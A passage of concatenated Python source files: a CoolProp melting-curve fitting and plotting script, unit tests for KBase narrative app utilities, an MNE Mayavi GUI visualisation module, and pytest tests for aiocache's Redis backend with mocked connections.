T = np.linspace(Tmin, Tmax, 200)
T_0 = value['T_0']
p_0 = value['p_0']
a = value['a']
c = value['c']
p = p_0 + a*((T/T_0)**c - 1)
axp.plot(T, p)
cc = 1.75
aa = 3e8#(101325-p_0)/((T_m/T_0)**cc-1)
pt = CP.Props(fluid,'ptriple')
pp = pt + aa*((T/Tmin)**cc - 1)
axp.plot(T_m,101325,'*')
axp.plot(T,pp,'--')
print(fluid, CP.Props(fluid,"molemass"), CP.Props(fluid, 'accentric'), pp[-1]/p[-1]-1)
# if fluid == 'Helium':
# T = np.array([326.2,345.1,362.8,385.1,419.4,459,499,535.7,570,608])
# p = p_0 + a*((T/T_0)**c - 1)
# print p
def Tr():
global ip, irho
for fluid, values in polynomial_in_Tr.items():
axp = figp.add_subplot(Nrow, Ncol, ip); ip += 1
axrho = figrho.add_subplot(Nrow, Ncol, irho); irho += 1
axp.set_xlabel('T [K]')
axp.set_ylabel('p [Pa]')
axrho.set_xlabel('T [K]')
axrho.set_ylabel('rho [mol/m$^3$]')
axp.set_title(fluid+' - '+str(round(CP.Props(fluid,"molemass"),2)))
axrho.set_title(fluid)
fname = os.path.join('fluids',fluid+'.json')
j = json.load(open(fname,'r'))
for part in values['parts']:
if 'T_min' not in part:
part['T_min'] = round(CP.Props(fluid,"Tmin"),4)
values['type'] = 'polynomial_in_Tr'
j['ANCILLARIES']['melting_line'] = values
fp = open(fname,'w')
from package_json import json_options
fp.write(json.dumps(j,**json_options))
fp.close()
if fluid == 'Ethylene':
T = [104.003, 104.059, 104.13, 104.2, 104.27, 104.41, 104.55, 104.69, 104.83, 104.969, 105.108, 105.386, 106.077, 106.764, 107.446, 111.384, 119.283, 127.136, 158.146, 188.621]
p = np.array([0.1, 0.5, 1, 1.5, 2, 3, 4, 5, 6, 7, 8, 10, 15, 20, 25, 50, 75, 100, 200, 300])*1e6
axp.plot(T,p,'*')
# if not isinstance(values, list):
# values = [values]
# df = pandas.read_csv('melting_curves/'+fluid+'.mlt',names=['T','p','rho'])
# axp.plot(df['T'], df['p'], 'o', mfc='none')
# x,y = plot_rho(df['T'],df['rho'],fit = True)
# axrho.plot(x,y, 'o', mfc='none')
#
# else:
# for i in ['I','II']:
# df = pandas.read_csv('melting_curves/'+fluid+'-'+i+'.mlt',names=['T','p','rho'])
# axp.plot(df['T'], df['p'], 'o', mfc='none')
# x,y = plot_rho(df['T'],df['rho'],fit = True)
# axrho.plot(x,y, 'o', mfc='none')
T_m = values['T_m']
for i,value in enumerate(values['parts']):
Tmin = value.get('T_min',CP.Props(fluid,"Tmin"))
Tmax = value['T_max']
T = np.linspace(Tmin, Tmax, 200)
a = value['a']
t = value['t']
T_t = value['T_0']
p_t = value['p_0']
RHS = 0
for i in range(len(a)):
RHS += a[i]*((T/T_t)**t[i] - 1)
p = p_t*(RHS + 1)
axp.plot(T, p)
cc = 1.75
aa = 3e8#(101325-p_0)/((T_m/T_0)**cc-1)
pt = CP.Props(fluid,'ptriple')
pp = pt + aa*((T/Tmin)**cc - 1)
axp.plot(T_m,101325,'*')
axp.plot(T,pp,'--')
print(fluid, CP.Props(fluid,"molemass"), CP.Props(fluid, 'accentric'), pp[-1]/p[-1]-1)
def theta():
global ip, irho
for fluid, values in polynomial_in_theta.items():
axp = figp.add_subplot(Nrow, Ncol, ip); ip += 1
axrho = figrho.add_subplot(Nrow, Ncol, irho); irho += 1
axp.set_xlabel('T [K]')
axp.set_ylabel('p [Pa]')
axrho.set_xlabel('T [K]')
axrho.set_ylabel('rho [mol/m$^3$]')
axp.set_title(fluid+' - '+str(round(CP.Props(fluid,"molemass"),2)))
axrho.set_title(fluid)
fname = os.path.join('fluids',fluid+'.json')
j = json.load(open(fname,'r'))
for part in values['parts']:
if 'T_min' not in part:
part['T_min'] = round(CP.Props(fluid,"Tmin"),4)
values['type'] = 'polynomial_in_Theta'
j['ANCILLARIES']['melting_line'] = values
fp = open(fname,'w')
from package_json import json_options
fp.write(json.dumps(j,**json_options))
fp.close()
T_m = values['T_m']
for value in values['parts']:
a = value['a']
t = value['t']
T_t = value['T_0']
p_t = value['p_0']
Tmin = T_t
Tmax = value['T_max']
T = np.linspace(Tmin, Tmax, 200)
RHS = 0
for i in range(len(a)):
RHS += a[i]*(T/T_t - 1)**t[i]
p = p_t*(RHS + 1)
#df = pandas.read_csv('melting_curves/' + fluid + '.mlt', names=['T','p','rho'])
#axp.plot(df['T'], df['p'], 'o', mfc='none')
axp.plot(T, p)
#x,y = plot_rho(df['T'],df['rho'],fit = True)
#axrho.plot(x,y, 'o', mfc='none')
cc = 1.75
aa = 3e8#(101325-p_0)/((T_m/T_0)**cc-1)
pt = CP.Props(fluid,'ptriple')
pp = pt + aa*((T/Tmin)**cc - 1)
axp.plot(T_m,101325,'*')
axp.plot(T,pp,'--')
print(fluid, CP.Props(fluid,"molemass"), CP.Props(fluid, 'accentric'), pp[-1]/p[-1]-1)
if __name__=='__main__':
simon()
Tr()
theta()
figp.tight_layout()
figrho.tight_layout()
figp.savefig('p.pdf')
figrho.savefig('rho.pdf')
plt.close()
|
|
"""
Tests for the app_util module
"""
import unittest
import biokbase.auth
from biokbase.narrative.app_util import (
check_tag,
system_variable,
get_result_sub_path,
map_inputs_from_job,
map_outputs_from_state,
)
from .narrative_mock.mockclients import get_mock_client
import os
import mock
from . import util
import time
__author__ = "Bill Riehl <[email protected]>"
class DummyWorkspace:
def get_workspace_info(*args, **kwargs):
return [12345]
class AppUtilTestCase(unittest.TestCase):
@classmethod
def setUpClass(self):
config = util.TestConfig()
self.user_id = config.get("users", "test_user")
self.user_token = util.read_token_file(
config.get_path("token_files", "test_user", from_root=True)
)
self.good_tag = "release"
self.bad_tag = "notATag"
# inject phony variables into the environment
# self.user_id = "KBaseTest"
# self.good_fake_token = "A1B2C3D4E5F6G7H8I9J0K1L2M3N4O5P6"
self.bad_fake_token = "NotAGoodTokenLOL"
self.workspace = "valid_workspace"
def test_check_tag_good(self):
self.assertTrue(check_tag(self.good_tag))
def test_check_tag_bad(self):
self.assertFalse(check_tag(self.bad_tag))
def test_check_tag_bad_except(self):
with self.assertRaises(ValueError):
check_tag(self.bad_tag, raise_exception=True)
def test_sys_var_user(self):
if self.user_token:
biokbase.auth.set_environ_token(self.user_token)
self.assertEqual(system_variable("user_id"), self.user_id)
def test_sys_var_no_ws(self):
if "KB_WORKSPACE_ID" in os.environ:
del os.environ["KB_WORKSPACE_ID"]
self.assertIsNone(system_variable("workspace"))
def test_sys_var_workspace(self):
os.environ["KB_WORKSPACE_ID"] = self.workspace
self.assertEqual(system_variable("workspace"), self.workspace)
def test_sys_var_no_ws_id(self):
if "KB_WORKSPACE_ID" in os.environ:
del os.environ["KB_WORKSPACE_ID"]
self.assertIsNone(system_variable("workspace_id"))
@mock.patch("biokbase.narrative.app_util.clients.get", get_mock_client)
def test_sys_var_workspace_id(self):
os.environ["KB_WORKSPACE_ID"] = self.workspace
self.assertEqual(system_variable("workspace_id"), 12345)
@mock.patch("biokbase.narrative.app_util.clients.get", get_mock_client)
def test_sys_var_workspace_id_except(self):
os.environ["KB_WORKSPACE_ID"] = "invalid_workspace"
self.assertIsNone(system_variable("workspace_id"))
def test_sys_var_user_bad(self):
biokbase.auth.set_environ_token(self.bad_fake_token)
self.assertIsNone(system_variable("user_id"))
def test_sys_var_user_none(self):
if "KB_AUTH_TOKEN" in os.environ:
del os.environ["KB_AUTH_TOKEN"]
self.assertIsNone(system_variable("user_id"))
def test_sys_var_time_ms(self):
cur_t = int(time.time() * 1000)
ts = system_variable("timestamp_epoch_ms")
self.assertTrue(cur_t <= ts)
self.assertTrue(ts - cur_t < 1000)
def test_sys_var_time_sec(self):
cur_t = int(time.time())
ts = system_variable("timestamp_epoch_sec")
self.assertTrue(cur_t <= ts)
self.assertTrue(ts - cur_t < 1)
def test_sys_var_bad(self):
self.assertIsNone(system_variable(self.bad_tag))
def test_get_result_sub_path(self):
result = [{"report": "this_is_a_report", "report_ref": "123/456/7"}]
path = [0, "report_ref"]
self.assertEqual(get_result_sub_path(result, path), "123/456/7")
def test_get_result_sub_path_deep_list(self):
result = ["foo", "bar", "baz"]
path = [2]
self.assertEqual(get_result_sub_path(result, path), "baz")
def test_get_result_sub_path_deep_obj(self):
result = ["foo", {"bar": "baz"}, "foobar"]
path = [1, "bar"]
self.assertEqual(get_result_sub_path(result, path), "baz")
def test_get_result_obj_path(self):
result = ["foo", 0, {"bar": {"baz": [10, 11, 12, 13]}}]
path = [2, "bar", "baz", 3]
self.assertEqual(get_result_sub_path(result, path), 13)
def test_get_result_sub_path_list_fail(self):
result = ["foo"]
path = [2]
self.assertIsNone(get_result_sub_path(result, path))
def test_get_result_sub_path_key_fail(self):
result = {"foo": "bar"}
path = ["baz"]
self.assertIsNone(get_result_sub_path(result, path))
def test_map_inputs_from_job(self):
inputs = [
"input1",
{"ws": "my_workspace", "foo": "bar"},
"some_ref/obj_id",
["ref/num_1", "ref/num_2", "num_3"],
123,
]
app_spec = {
"behavior": {
"kb_service_input_mapping": [
{"target_position": 0, "input_parameter": "an_input"},
{
"target_position": 1,
"target_property": "ws",
"input_parameter": "workspace",
},
{
"target_position": 1,
"target_property": "foo",
"input_parameter": "baz",
},
{
"target_position": 2,
"input_parameter": "ref_input",
"target_type_transform": "ref",
},
{
"target_position": 3,
"input_parameter": "a_list",
"target_type_transform": "list<ref>",
},
{
"target_position": 4,
"input_parameter": "a_num",
"target_type_transform": "int",
},
],
}
}
expected = {
"an_input": "input1",
"workspace": "my_workspace",
"baz": "bar",
"ref_input": "obj_id",
"a_list": ["num_1", "num_2", "num_3"],
"a_num": 123,
}
self.assertDictEqual(map_inputs_from_job(inputs, app_spec), expected)
def test_map_outputs_from_state_simple(self):
os.environ["KB_WORKSPACE_ID"] = self.workspace
app_spec = {
"parameters": [],
"behavior": {
"output_mapping": [{"narrative_system_variable": "workspace"}]
},
}
self.assertTupleEqual(
map_outputs_from_state(None, None, app_spec),
("kbaseDefaultNarrativeOutput", self.workspace),
)
def test_map_outputs_from_state(self):
os.environ["KB_WORKSPACE_ID"] = self.workspace
app_spec = {
"widgets": {"input": None, "output": "testOutputWidget"},
"parameters": [],
"behavior": {
"kb_service_output_mapping": [
{"narrative_system_variable": "workspace", "target_property": "ws"},
{"constant_value": 5, "target_property": "a_constant"},
{
"service_method_output_path": [1],
"target_property": "a_path_ref",
},
{"input_parameter": "an_input", "target_property": "an_input"},
]
},
}
params = {"an_input": "input_val"}
state = {"job_output": {"result": ["foo", "bar"]}}
expected = (
"testOutputWidget",
{
"ws": self.workspace,
"a_constant": 5,
"a_path_ref": "bar",
"an_input": "input_val",
},
)
self.assertTupleEqual(map_outputs_from_state(state, params, app_spec), expected)
def test_map_outputs_from_state_bad_spec(self):
os.environ["KB_WORKSPACE_ID"] = self.workspace
app_spec = {"not": "really"}
params = {"an_input": "input_val"}
state = {}
with self.assertRaises(ValueError):
map_outputs_from_state(state, params, app_spec)
if __name__ == "__main__":
unittest.main()
|
|
"""Mayavi/traits GUI visualization elements"""
# Authors: Christian Brodbeck <[email protected]>
#
# License: BSD (3-clause)
import os
import numpy as np
# allow import without traits
try:
from mayavi.mlab import pipeline, text3d
from mayavi.modules.glyph import Glyph
from mayavi.modules.surface import Surface
from mayavi.sources.vtk_data_source import VTKDataSource
from mayavi.tools.mlab_scene_model import MlabSceneModel
from pyface.api import error
from traits.api import (HasTraits, HasPrivateTraits, on_trait_change,
cached_property, Instance, Property, Array, Bool,
Button, Color, Enum, Float, Int, List, Range, Str)
from traitsui.api import View, Item, Group, HGroup, VGrid, VGroup
except:
from ..utils import trait_wraith
HasTraits = HasPrivateTraits = object
cached_property = on_trait_change = MlabSceneModel = Array = Bool = \
Button = Color = Enum = Float = Instance = Int = List = Property = \
Range = Str = View = Item = Group = HGroup = VGrid = VGroup = \
Glyph = Surface = VTKDataSource = trait_wraith
from ..transforms import apply_trans
headview_item = Item('headview', style='custom', show_label=False)
headview_borders = VGroup(Item('headview', style='custom', show_label=False),
show_border=True, label='View')
defaults = {'mri_fid_scale': 1e-2, 'hsp_fid_scale': 3e-2,
'hsp_fid_opacity': 0.3, 'hsp_points_scale': 4e-3,
'mri_color': (252, 227, 191), 'hsp_point_color': (255, 255, 255),
'lpa_color': (255, 0, 0), 'nasion_color': (0, 255, 0),
'rpa_color': (0, 0, 255)}
def _testing_mode():
"""Helper to determine if we're running tests"""
return (os.getenv('_MNE_GUI_TESTING_MODE', '') == 'true')
class HeadViewController(HasTraits):
"""
Set head views for Anterior-Left-Superior coordinate system
Parameters
----------
system : 'RAS' | 'ALS' | 'ARI'
Coordinate system described as initials for directions associated with
the x, y, and z axes. Relevant terms are: Anterior, Right, Left,
Superior, Inferior.
"""
system = Enum("RAS", "ALS", "ARI", desc="Coordinate system: directions of "
"the x, y, and z axis.")
right = Button()
front = Button()
left = Button()
top = Button()
scale = Float(0.16)
scene = Instance(MlabSceneModel)
view = View(VGrid('0', 'top', '0', Item('scale', label='Scale',
show_label=True),
'right', 'front', 'left', show_labels=False, columns=4))
@on_trait_change('scene.activated')
def _init_view(self):
self.scene.parallel_projection = True
# apparently scene.activated happens several times
if self.scene.renderer:
self.sync_trait('scale', self.scene.camera, 'parallel_scale')
# and apparently this does not happen by default:
self.on_trait_change(self.scene.render, 'scale')
@on_trait_change('top,left,right,front')
def on_set_view(self, view, _):
if self.scene is None:
return
system = self.system
kwargs = None
if system == 'ALS':
if view == 'front':
kwargs = dict(azimuth=0, elevation=90, roll=-90)
elif view == 'left':
kwargs = dict(azimuth=90, elevation=90, roll=180)
elif view == 'right':
kwargs = dict(azimuth=-90, elevation=90, roll=0)
elif view == 'top':
kwargs = dict(azimuth=0, elevation=0, roll=-90)
elif system == 'RAS':
if view == 'front':
kwargs = dict(azimuth=90, elevation=90, roll=180)
elif view == 'left':
kwargs = dict(azimuth=180, elevation=90, roll=90)
elif view == 'right':
kwargs = dict(azimuth=0, elevation=90, roll=270)
elif view == 'top':
kwargs = dict(azimuth=90, elevation=0, roll=180)
elif system == 'ARI':
if view == 'front':
kwargs = dict(azimuth=0, elevation=90, roll=90)
elif view == 'left':
kwargs = dict(azimuth=-90, elevation=90, roll=180)
elif view == 'right':
kwargs = dict(azimuth=90, elevation=90, roll=0)
elif view == 'top':
kwargs = dict(azimuth=0, elevation=180, roll=90)
else:
raise ValueError("Invalid system: %r" % system)
if kwargs is None:
raise ValueError("Invalid view: %r" % view)
if not _testing_mode():
self.scene.mlab.view(distance=None, reset_roll=True,
figure=self.scene.mayavi_scene, **kwargs)
class Object(HasPrivateTraits):
"""Represents a 3d object in a mayavi scene"""
points = Array(float, shape=(None, 3))
trans = Array()
name = Str
scene = Instance(MlabSceneModel, ())
src = Instance(VTKDataSource)
color = Color()
rgbcolor = Property(depends_on='color')
point_scale = Float(10, label='Point Scale')
opacity = Range(low=0., high=1., value=1.)
visible = Bool(True)
@cached_property
def _get_rgbcolor(self):
if hasattr(self.color, 'Get'): # wx
color = tuple(v / 255. for v in self.color.Get())
else:
color = self.color.getRgbF()[:3]
return color
@on_trait_change('trans,points')
def _update_points(self):
"""Update the location of the plotted points"""
if not hasattr(self.src, 'data'):
return
trans = self.trans
if np.any(trans):
if trans.ndim == 0 or trans.shape == (3,) or trans.shape == (1, 3):
pts = self.points * trans
elif trans.shape == (3, 3):
pts = np.dot(self.points, trans.T)
elif trans.shape == (4, 4):
pts = apply_trans(trans, self.points)
else:
err = ("trans must be a scalar, a length 3 sequence, or an "
"array of shape (1,3), (3, 3) or (4, 4). "
"Got %s" % str(trans))
error(None, err, "Display Error")
raise ValueError(err)
else:
pts = self.points
self.src.data.points = pts
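# Illustrative sketch, not used by the GUI classes: the transform conventions handled in
# Object._update_points above, written as a standalone helper. Only the (4, 4) branch
# needs apply_trans; everything else is plain NumPy.
def _apply_object_trans(points, trans):
    trans = np.asarray(trans)
    if trans.ndim == 0 or trans.shape in ((3,), (1, 3)):
        return points * trans              # per-axis scaling
    if trans.shape == (3, 3):
        return np.dot(points, trans.T)     # rotation / linear map
    if trans.shape == (4, 4):
        return apply_trans(trans, points)  # full affine transform
    raise ValueError("trans must be a scalar, a length-3 sequence, or an array of "
                     "shape (1, 3), (3, 3) or (4, 4); got %r" % (trans.shape,))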
class PointObject(Object):
"""Represents a group of individual points in a mayavi scene"""
label = Bool(False, enabled_when='visible')
text3d = List
glyph = Instance(Glyph)
resolution = Int(8)
def __init__(self, view='points', *args, **kwargs):
"""
Parameters
----------
view : 'points' | 'cloud'
Whether the view options should be tailored to individual points
or a point cloud.
"""
self._view = view
super(PointObject, self).__init__(*args, **kwargs)
def default_traits_view(self):
color = Item('color', show_label=False)
scale = Item('point_scale', label='Size')
if self._view == 'points':
visible = Item('visible', label='Show', show_label=True)
view = View(HGroup(visible, color, scale, 'label'))
elif self._view == 'cloud':
visible = Item('visible', show_label=False)
view = View(HGroup(visible, color, scale))
else:
raise ValueError("PointObject(view = %r)" % self._view)
return view
@on_trait_change('label')
def _show_labels(self, show):
self.scene.disable_render = True
while self.text3d:
text = self.text3d.pop()
text.remove()
if show:
fig = self.scene.mayavi_scene
for i, pt in enumerate(np.array(self.src.data.points)):
x, y, z = pt
t = text3d(x, y, z, ' %i' % i, scale=.01, color=self.rgbcolor,
figure=fig)
self.text3d.append(t)
self.scene.disable_render = False
@on_trait_change('visible')
def _on_hide(self):
if not self.visible:
self.label = False
@on_trait_change('scene.activated')
def _plot_points(self):
"""Add the points to the mayavi pipeline"""
# _scale = self.scene.camera.parallel_scale
if hasattr(self.glyph, 'remove'):
self.glyph.remove()
if hasattr(self.src, 'remove'):
self.src.remove()
if not _testing_mode():
fig = self.scene.mayavi_scene
else:
fig = None
x, y, z = self.points.T
scatter = pipeline.scalar_scatter(x, y, z)
glyph = pipeline.glyph(scatter, color=self.rgbcolor, figure=fig,
scale_factor=self.point_scale, opacity=1.,
resolution=self.resolution)
self.src = scatter
self.glyph = glyph
self.sync_trait('point_scale', self.glyph.glyph.glyph, 'scale_factor')
self.sync_trait('rgbcolor', self.glyph.actor.property, 'color',
mutual=False)
self.sync_trait('visible', self.glyph)
self.sync_trait('opacity', self.glyph.actor.property)
self.on_trait_change(self._update_points, 'points')
# self.scene.camera.parallel_scale = _scale
def _resolution_changed(self, new):
if not self.glyph:
return
self.glyph.glyph.glyph_source.glyph_source.phi_resolution = new
self.glyph.glyph.glyph_source.glyph_source.theta_resolution = new
class SurfaceObject(Object):
"""Represents a solid object in a mayavi scene
Notes
-----
Doesn't automatically update the plot because an update requires both
:attr:`points` and :attr:`tri`. Call :meth:`plot` after updating both
attributes.
"""
rep = Enum("Surface", "Wireframe")
tri = Array(int, shape=(None, 3))
surf = Instance(Surface)
view = View(HGroup(Item('visible', show_label=False),
Item('color', show_label=False), Item('opacity')))
def clear(self):
if hasattr(self.src, 'remove'):
self.src.remove()
if hasattr(self.surf, 'remove'):
self.surf.remove()
self.reset_traits(['src', 'surf'])
@on_trait_change('scene.activated')
def plot(self):
"""Add the points to the mayavi pipeline"""
_scale = self.scene.camera.parallel_scale if not _testing_mode() else 1
self.clear()
if not np.any(self.tri):
return
fig = self.scene.mayavi_scene
x, y, z = self.points.T
if self.rep == 'Wireframe':
rep = 'wireframe'
else:
rep = 'surface'
src = pipeline.triangular_mesh_source(x, y, z, self.tri, figure=fig)
surf = pipeline.surface(src, figure=fig, color=self.rgbcolor,
opacity=self.opacity,
representation=rep, line_width=1)
self.src = src
self.surf = surf
self.sync_trait('visible', self.surf, 'visible')
self.sync_trait('rgbcolor', self.surf.actor.property, 'color',
mutual=False)
self.sync_trait('opacity', self.surf.actor.property, 'opacity')
if not _testing_mode():
self.scene.camera.parallel_scale = _scale
|
|
import pytest
import aioredis
from asynctest import CoroutineMock, MagicMock, patch, ANY
from aiocache import RedisCache
from aiocache.base import BaseCache
from aiocache.serializers import JsonSerializer
from aiocache.backends.redis import RedisBackend, conn, AIOREDIS_BEFORE_ONE
@pytest.fixture
def redis_connection():
conn = MagicMock()
conn.__enter__ = MagicMock(return_value=conn)
conn.__exit__ = MagicMock()
conn.get = CoroutineMock()
conn.mget = CoroutineMock()
conn.set = CoroutineMock()
conn.setex = CoroutineMock()
conn.mset = CoroutineMock()
conn.incrby = CoroutineMock()
conn.exists = CoroutineMock()
conn.persist = CoroutineMock()
conn.expire = CoroutineMock()
conn.delete = CoroutineMock()
conn.flushdb = CoroutineMock()
conn.eval = CoroutineMock()
conn.keys = CoroutineMock()
conn.multi_exec = MagicMock(return_value=conn)
conn.execute = CoroutineMock()
return conn
@pytest.fixture
def redis_pool(redis_connection):
class FakePool:
def __await__(self):
yield
return redis_connection
pool = FakePool()
pool._conn = redis_connection
pool.release = CoroutineMock()
pool.clear = CoroutineMock()
pool.acquire = CoroutineMock(return_value=redis_connection)
pool.__call__ = MagicMock(return_value=pool)
return pool
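# Note on the fixture above: FakePool.__await__ lets the mock work whether the backend
# awaits the pool object directly or goes through pool.acquire() (a CoroutineMock), while
# release/clear stay inspectable CoroutineMocks for the assertions below.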
@pytest.fixture
def redis(redis_pool):
redis = RedisBackend()
redis._pool = redis_pool
yield redis
@pytest.fixture
def create_pool():
with patch("aiocache.backends.redis.aioredis.create_pool") as create_pool:
yield create_pool
@pytest.fixture(autouse=True)
def mock_redis_v1(mocker, redis_connection):
mocker.patch("aiocache.backends.redis.aioredis.Redis", return_value=redis_connection)
class TestRedisBackend:
def test_setup(self):
redis_backend = RedisBackend()
assert redis_backend.endpoint == "127.0.0.1"
assert redis_backend.port == 6379
assert redis_backend.db == 0
assert redis_backend.password is None
assert redis_backend.pool_min_size == 1
assert redis_backend.pool_max_size == 10
def test_setup_override(self):
redis_backend = RedisBackend(db=2, password="pass")
assert redis_backend.endpoint == "127.0.0.1"
assert redis_backend.port == 6379
assert redis_backend.db == 2
assert redis_backend.password == "pass"
def test_setup_casts(self):
redis_backend = RedisBackend(
db="2",
port="6379",
pool_min_size="1",
pool_max_size="10",
create_connection_timeout="1.5",
)
assert redis_backend.db == 2
assert redis_backend.port == 6379
assert redis_backend.pool_min_size == 1
assert redis_backend.pool_max_size == 10
assert redis_backend.create_connection_timeout == 1.5
@pytest.mark.asyncio
async def test_acquire_conn(self, redis, redis_connection):
assert await redis.acquire_conn() == redis_connection
@pytest.mark.asyncio
async def test_release_conn(self, redis):
conn = await redis.acquire_conn()
await redis.release_conn(conn)
if AIOREDIS_BEFORE_ONE:
redis._pool.release.assert_called_with(conn)
else:
redis._pool.release.assert_called_with(conn.connection)
@pytest.mark.asyncio
async def test_get_pool_sets_pool(self, redis, redis_pool, create_pool):
redis._pool = None
await redis._get_pool()
assert redis._pool == create_pool.return_value
@pytest.mark.asyncio
async def test_get_pool_reuses_existing_pool(self, redis):
redis._pool = "pool"
await redis._get_pool()
assert redis._pool == "pool"
@pytest.mark.asyncio
async def test_get_pool_locked(self, mocker, redis, create_pool):
redis._pool = None
mocker.spy(redis._pool_lock, "acquire")
mocker.spy(redis._pool_lock, "release")
assert await redis._get_pool() == create_pool.return_value
assert redis._pool_lock.acquire.call_count == 1
assert redis._pool_lock.release.call_count == 1
@pytest.mark.asyncio
async def test_get_pool_calls_create_pool(self, redis, create_pool):
redis._pool = None
await redis._get_pool()
if AIOREDIS_BEFORE_ONE:
create_pool.assert_called_with(
(redis.endpoint, redis.port),
db=redis.db,
password=redis.password,
loop=redis._loop,
encoding="utf-8",
minsize=redis.pool_min_size,
maxsize=redis.pool_max_size,
)
else:
create_pool.assert_called_with(
(redis.endpoint, redis.port),
db=redis.db,
password=redis.password,
loop=redis._loop,
encoding="utf-8",
minsize=redis.pool_min_size,
maxsize=redis.pool_max_size,
create_connection_timeout=redis.create_connection_timeout,
)
@pytest.mark.asyncio
async def test_get(self, redis, redis_connection):
await redis._get(pytest.KEY)
redis_connection.get.assert_called_with(pytest.KEY, encoding="utf-8")
@pytest.mark.asyncio
async def test_gets(self, mocker, redis, redis_connection):
mocker.spy(redis, "_get")
await redis._gets(pytest.KEY)
redis._get.assert_called_with(pytest.KEY, encoding="utf-8", _conn=ANY)
@pytest.mark.asyncio
async def test_set(self, redis, redis_connection):
await redis._set(pytest.KEY, "value")
redis_connection.set.assert_called_with(pytest.KEY, "value")
await redis._set(pytest.KEY, "value", ttl=1)
redis_connection.setex.assert_called_with(pytest.KEY, 1, "value")
@pytest.mark.asyncio
async def test_set_cas_token(self, mocker, redis, redis_connection):
mocker.spy(redis, "_cas")
await redis._set(pytest.KEY, "value", _cas_token="old_value", _conn=redis_connection)
redis._cas.assert_called_with(
pytest.KEY, "value", "old_value", ttl=None, _conn=redis_connection
)
@pytest.mark.asyncio
async def test_cas(self, mocker, redis, redis_connection):
mocker.spy(redis, "_raw")
await redis._cas(pytest.KEY, "value", "old_value", ttl=10, _conn=redis_connection)
redis._raw.assert_called_with(
"eval",
redis.CAS_SCRIPT,
[pytest.KEY],
["value", "old_value", "EX", 10],
_conn=redis_connection,
)
@pytest.mark.asyncio
async def test_cas_float_ttl(self, mocker, redis, redis_connection):
mocker.spy(redis, "_raw")
await redis._cas(pytest.KEY, "value", "old_value", ttl=0.1, _conn=redis_connection)
redis._raw.assert_called_with(
"eval",
redis.CAS_SCRIPT,
[pytest.KEY],
["value", "old_value", "PX", 100],
_conn=redis_connection,
)
@pytest.mark.asyncio
async def test_multi_get(self, redis, redis_connection):
await redis._multi_get([pytest.KEY, pytest.KEY_1])
redis_connection.mget.assert_called_with(pytest.KEY, pytest.KEY_1, encoding="utf-8")
@pytest.mark.asyncio
async def test_multi_set(self, redis, redis_connection):
await redis._multi_set([(pytest.KEY, "value"), (pytest.KEY_1, "random")])
redis_connection.mset.assert_called_with(pytest.KEY, "value", pytest.KEY_1, "random")
@pytest.mark.asyncio
async def test_multi_set_with_ttl(self, redis, redis_connection):
await redis._multi_set([(pytest.KEY, "value"), (pytest.KEY_1, "random")], ttl=1)
assert redis_connection.multi_exec.call_count == 1
redis_connection.mset.assert_called_with(pytest.KEY, "value", pytest.KEY_1, "random")
redis_connection.expire.assert_any_call(pytest.KEY, timeout=1)
redis_connection.expire.assert_any_call(pytest.KEY_1, timeout=1)
assert redis_connection.execute.call_count == 1
@pytest.mark.asyncio
async def test_add(self, redis, redis_connection):
await redis._add(pytest.KEY, "value")
redis_connection.set.assert_called_with(pytest.KEY, "value", exist=ANY, expire=None)
await redis._add(pytest.KEY, "value", 1)
redis_connection.set.assert_called_with(pytest.KEY, "value", exist=ANY, expire=1)
@pytest.mark.asyncio
async def test_add_existing(self, redis, redis_connection):
redis_connection.set.return_value = False
with pytest.raises(ValueError):
await redis._add(pytest.KEY, "value")
@pytest.mark.asyncio
async def test_add_float_ttl(self, redis, redis_connection):
await redis._add(pytest.KEY, "value", 0.1)
redis_connection.set.assert_called_with(pytest.KEY, "value", exist=ANY, pexpire=100)
@pytest.mark.asyncio
async def test_exists(self, redis, redis_connection):
redis_connection.exists.return_value = 1
await redis._exists(pytest.KEY)
redis_connection.exists.assert_called_with(pytest.KEY)
@pytest.mark.asyncio
async def test_expire(self, redis, redis_connection):
await redis._expire(pytest.KEY, ttl=1)
redis_connection.expire.assert_called_with(pytest.KEY, 1)
@pytest.mark.asyncio
async def test_increment(self, redis, redis_connection):
await redis._increment(pytest.KEY, delta=2)
redis_connection.incrby.assert_called_with(pytest.KEY, 2)
@pytest.mark.asyncio
async def test_increment_typerror(self, redis, redis_connection):
redis_connection.incrby.side_effect = aioredis.errors.ReplyError("msg")
with pytest.raises(TypeError):
await redis._increment(pytest.KEY, 2)
@pytest.mark.asyncio
async def test_expire_0_ttl(self, redis, redis_connection):
await redis._expire(pytest.KEY, ttl=0)
redis_connection.persist.assert_called_with(pytest.KEY)
@pytest.mark.asyncio
async def test_delete(self, redis, redis_connection):
await redis._delete(pytest.KEY)
redis_connection.delete.assert_called_with(pytest.KEY)
@pytest.mark.asyncio
async def test_clear(self, redis, redis_connection):
redis_connection.keys.return_value = ["nm:a", "nm:b"]
await redis._clear("nm")
redis_connection.delete.assert_called_with("nm:a", "nm:b")
@pytest.mark.asyncio
async def test_clear_no_keys(self, redis, redis_connection):
redis_connection.keys.return_value = []
await redis._clear("nm")
redis_connection.delete.assert_not_called()
@pytest.mark.asyncio
async def test_clear_no_namespace(self, redis, redis_connection):
await redis._clear()
assert redis_connection.flushdb.call_count == 1
@pytest.mark.asyncio
async def test_raw(self, redis, redis_connection):
await redis._raw("get", pytest.KEY)
await redis._raw("set", pytest.KEY, 1)
redis_connection.get.assert_called_with(pytest.KEY, encoding=ANY)
redis_connection.set.assert_called_with(pytest.KEY, 1)
@pytest.mark.asyncio
async def test_redlock_release(self, mocker, redis):
mocker.spy(redis, "_raw")
await redis._redlock_release(pytest.KEY, "random")
redis._raw.assert_called_with("eval", redis.RELEASE_SCRIPT, [pytest.KEY], ["random"])
@pytest.mark.asyncio
async def test_close_when_connected(self, redis):
await redis._raw("set", pytest.KEY, 1)
await redis._close()
assert redis._pool.clear.call_count == 1
@pytest.mark.asyncio
async def test_close_when_not_connected(self, redis, redis_pool):
redis._pool = None
await redis._close()
assert redis_pool.clear.call_count == 0
class TestConn:
async def dummy(self, *args, _conn=None, **kwargs):
pass
@pytest.mark.asyncio
async def test_conn(self, redis, redis_connection, mocker):
mocker.spy(self, "dummy")
d = conn(self.dummy)
await d(redis, "a", _conn=None)
self.dummy.assert_called_with(redis, "a", _conn=redis_connection)
@pytest.mark.asyncio
async def test_conn_reuses(self, redis, redis_connection, mocker):
mocker.spy(self, "dummy")
d = conn(self.dummy)
await d(redis, "a", _conn=redis_connection)
self.dummy.assert_called_with(redis, "a", _conn=redis_connection)
await d(redis, "a", _conn=redis_connection)
self.dummy.assert_called_with(redis, "a", _conn=redis_connection)
class TestRedisCache:
